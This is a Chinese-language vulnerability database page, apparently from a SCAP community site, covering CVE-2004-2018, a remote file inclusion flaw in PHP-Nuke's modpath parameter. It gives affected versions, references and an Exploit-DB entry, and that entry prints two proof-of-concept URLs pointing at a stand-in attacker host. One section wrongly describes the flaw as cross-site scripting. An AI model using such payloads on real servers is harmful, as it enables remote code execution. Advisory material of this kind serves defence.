CVE-2004-2018
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:04:56
NMCOE    

[原文]PHP remote file inclusion vulnerability in index.php in Php-Nuke 6.x through 7.3 allows remote attackers to execute arbitrary PHP code by modifying the modpath parameter to reference a URL on a remote web server that contains the code.


[CNNVD]PHP-Nuke Modpath参数文件包含漏洞(CNNVD-200412-315)

        
        PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
        PHP-Nuke存在文件包含问题,远程攻击者可以利用这个漏洞以WEB进程权限查看系统任意文件内容。
        PHP-Nuke对用户提交给'modpath'参数的数据缺少过滤,攻击者可以指定远程服务器上的恶意文件作为包含文件,可以以WEB进程权限执行恶意文件中的任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:francisco_burzi:php-nuke:7.2
cpe:/a:francisco_burzi:php-nuke:6.0
cpe:/a:francisco_burzi:php-nuke:7.0
cpe:/a:francisco_burzi:php-nuke:6.6
cpe:/a:francisco_burzi:php-nuke:6.5_rc1
cpe:/a:francisco_burzi:php-nuke:7.1
cpe:/a:francisco_burzi:php-nuke:7.0_final
cpe:/a:francisco_burzi:php-nuke:6.5_rc2
cpe:/a:francisco_burzi:php-nuke:6.9
cpe:/a:francisco_burzi:php-nuke:6.5_beta1
cpe:/a:francisco_burzi:php-nuke:6.5_rc3
cpe:/a:francisco_burzi:php-nuke:6.7
cpe:/a:francisco_burzi:php-nuke:7.3
cpe:/a:francisco_burzi:php-nuke:6.5
cpe:/a:francisco_burzi:php-nuke:6.5_final

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2018
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2018
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-315
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0870.html
(UNKNOWN)  FULLDISC  20040517 [waraxe-2004-SA#029 - Possible remote file inclusion in PhpNuke 6.x - 7.3]
http://marc.info/?l=bugtraq&m=108482888621896&w=2
(UNKNOWN)  BUGTRAQ  20040517 [waraxe-2004-SA#029 - Possible remote file inclusion in PhpNuke 6.x - 7.3]
http://www.securityfocus.com/bid/10365
(UNKNOWN)  BID  10365
http://www.waraxe.us/index.php?modname=sa&id=29
(UNKNOWN)  MISC  http://www.waraxe.us/index.php?modname=sa&id=29
http://xforce.iss.net/xforce/xfdb/16218
(UNKNOWN)  XF  phpnuke-modpath-file-include(16218)

- 漏洞信息

PHP-Nuke Modpath参数文件包含漏洞
高危 输入验证
2004-12-31 00:00:00 2006-09-28 00:00:00
远程  
        
        PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
        PHP-Nuke存在文件包含问题,远程攻击者可以利用这个漏洞以WEB进程权限查看系统任意文件内容。
        PHP-Nuke对用户提交给'modpath'参数的数据缺少过滤,攻击者可以指定远程服务器上的恶意文件作为包含文件,可以以WEB进程权限执行恶意文件中的任意代码。
        

- 公告与补丁

        厂商补丁:
        Francisco Burzi
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.phpnuke.org

- 漏洞信息 (24127)

PHP-Nuke 6.x/7.x Modpath Parameter Potential File Include Vulnerability (EDBID:24127)
php webapps
2004-05-17 Verified
0 waraxe
N/A [点击下载]
source: http://www.securityfocus.com/bid/10365/info

PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.

If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/		

- 漏洞信息

6222
PHP-Nuke index.php modpath Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

PHP-Nuke contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "modpath" variable upon submission to the index.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-05-17 Unknow
2004-05-17 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Janek Vind has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站